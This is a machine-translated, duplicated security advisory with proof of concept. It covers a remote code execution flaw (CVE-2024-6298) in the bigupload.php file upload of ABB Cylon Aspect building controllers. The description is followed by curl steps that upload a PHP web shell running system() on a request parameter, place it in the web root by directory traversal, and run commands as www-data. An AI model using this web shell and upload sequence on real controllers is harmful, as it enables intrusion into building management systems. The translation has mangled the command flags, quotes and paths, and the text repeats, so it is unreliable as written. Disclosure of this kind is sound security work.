ABB CYLON方面3.08.01(bigupload.php)远程代码执行
Vendor: ABB Ltd.
产品网页: https://www.global.abb
受影响的版本: Nexus系列,Matrix-2系列,方面- 企业,方面- 企业
固件:=3.08.01
摘要:是屡获殊荣的可扩展建筑能源管理
和旨在允许用户无缝访问其的控制解决方案
通过包括智能设备在内的标准建筑协议来构建数据。
DESC: ABB BMS/BAS控制器遭受远程代码执行
脆弱性。 bigupload.php中的脆弱uploadfile()函数
使用php: //输入包装器不正确地读取原始帖子数据
足够的验证。该数据传递给FWRITE()函数,
允许任意文件写入。结合不当的消毒
文件路径,这导致目录遍历,允许攻击者
将恶意文件上传到任意位置。曾经是恶意文件
被写入可执行目录,身份验证的攻击者可以
触发文件执行代码并获得未经授权的访问
建筑控制器。
在: GNU/Linux 3.15.10(ARMV7L)上测试
gnu/linux 3.10.0(x86_64)
GNU/Linux 2.6.32(x86_64)
英特尔(R)原子(TM)处理器E3930 @ 1.30GHz
英特尔(R)Xeon(r)银4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
extackft自动化应用程序服务器
LightTPD/1.4.32
LightTPD/1.4.18
Apache/2.2.15(CentOS)
OpenJDK运行时环境(RHEL-2.6.22.1.-x86_64)
OpenJDK 64位服务器VM(构建24.261-B02,混合模式)
gjoko“ liquidworm” krstic发现的脆弱性
@Zeroscience
咨询ID: ZSL-2024-5828
咨询URL: https://www.zeroscience.mk/en/vulnerabilities/zsl-2024-5828.php
CVE ID: CVE-2024-6298
cve url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-6298
21.04.2024
- -
$ CAT项目
项目
。|
| |
|'| ._____
___ | | |。 |' 。----'|
_ .-'' - 。 | | 。--'| | | | _ | |
.-'| 。| | || ' - _ | | | | | | | |
|' | | | | | | | | | | | | | | | | | | | | | |
__ | ' - '''' - '' - 。 ``| __
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓███████▓▒░░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████████▒░▒▓██████▒░░▒▓████████████▒░▒▓██████▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░░▒▓█▓▒░░░░░░░░▒▓██████▓▒░
1。
$ curl -x post'http://192.168.73.31/bigupload.php?action=uploadkey=251'\
-h'cookie: phpsessid=25131337'\
-h'content-type:应用程序/x-www-form-urlencoded'\
-d'?php \ r \ nif($ _get ['j']){\ r \ nsystem($ _ get ['j'']); \ r \ n} \ r \ r \ n?''
2。
$ curl -x post'http://192.168.73.31/bigupload.php?action=uploadkey=251'\
-h'cookie: phpsessid=25131337'\
–h'content-type:应用程序/x-www-form-urlenCoded'
3。
$ curl -x post'http://192.168.73.31/bigupload.php?action=完成'\
-h'cookie: phpsessid=25131337'\
-h'content-type:应用程序/x-www-form-urlencoded'\
-d'key=251name=./././././././home/mix_cmix/htmlroot/zsl.php'
4。
$ curl 3http://192.168.73.31/zsl.php?j=id
uid=33(www-data)gid=33(www-data)组=33(www-data)
Vendor: ABB Ltd.
产品网页: https://www.global.abb
受影响的版本: Nexus系列,Matrix-2系列,方面- 企业,方面- 企业
固件:=3.08.01
摘要:是屡获殊荣的可扩展建筑能源管理
和旨在允许用户无缝访问其的控制解决方案
通过包括智能设备在内的标准建筑协议来构建数据。
DESC: ABB BMS/BAS控制器遭受远程代码执行
脆弱性。 bigupload.php中的脆弱uploadfile()函数
使用php: //输入包装器不正确地读取原始帖子数据
足够的验证。该数据传递给FWRITE()函数,
允许任意文件写入。结合不当的消毒
文件路径,这导致目录遍历,允许攻击者
将恶意文件上传到任意位置。曾经是恶意文件
被写入可执行目录,身份验证的攻击者可以
触发文件执行代码并获得未经授权的访问
建筑控制器。
在: GNU/Linux 3.15.10(ARMV7L)上测试
gnu/linux 3.10.0(x86_64)
GNU/Linux 2.6.32(x86_64)
英特尔(R)原子(TM)处理器E3930 @ 1.30GHz
英特尔(R)Xeon(r)银4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
extackft自动化应用程序服务器
LightTPD/1.4.32
LightTPD/1.4.18
Apache/2.2.15(CentOS)
OpenJDK运行时环境(RHEL-2.6.22.1.-x86_64)
OpenJDK 64位服务器VM(构建24.261-B02,混合模式)
gjoko“ liquidworm” krstic发现的脆弱性
@Zeroscience
咨询ID: ZSL-2024-5828
咨询URL: https://www.zeroscience.mk/en/vulnerabilities/zsl-2024-5828.php
CVE ID: CVE-2024-6298
cve url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-6298
21.04.2024
- -
$ CAT项目
项目
。|
| |
|'| ._____
___ | | |。 |' 。----'|
_ .-'' - 。 | | 。--'| | | | _ | |
.-'| 。| | || ' - _ | | | | | | | |
|' | | | | | | | | | | | | | | | | | | | | | |
__ | ' - '''' - '' - 。 ``| __
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓███████▓▒░░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████████▒░▒▓██████▒░░▒▓████████████▒░▒▓██████▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░░▒▓█▓▒░░░░░░░░▒▓██████▓▒░
1。
$ curl -x post'http://192.168.73.31/bigupload.php?action=uploadkey=251'\
-h'cookie: phpsessid=25131337'\
-h'content-type:应用程序/x-www-form-urlencoded'\
-d'?php \ r \ nif($ _get ['j']){\ r \ nsystem($ _ get ['j'']); \ r \ n} \ r \ r \ n?''
2。
$ curl -x post'http://192.168.73.31/bigupload.php?action=uploadkey=251'\
-h'cookie: phpsessid=25131337'\
–h'content-type:应用程序/x-www-form-urlenCoded'
3。
$ curl -x post'http://192.168.73.31/bigupload.php?action=完成'\
-h'cookie: phpsessid=25131337'\
-h'content-type:应用程序/x-www-form-urlencoded'\
-d'key=251name=./././././././home/mix_cmix/htmlroot/zsl.php'
4。
$ curl 3http://192.168.73.31/zsl.php?j=id
uid=33(www-data)gid=33(www-data)组=33(www-data)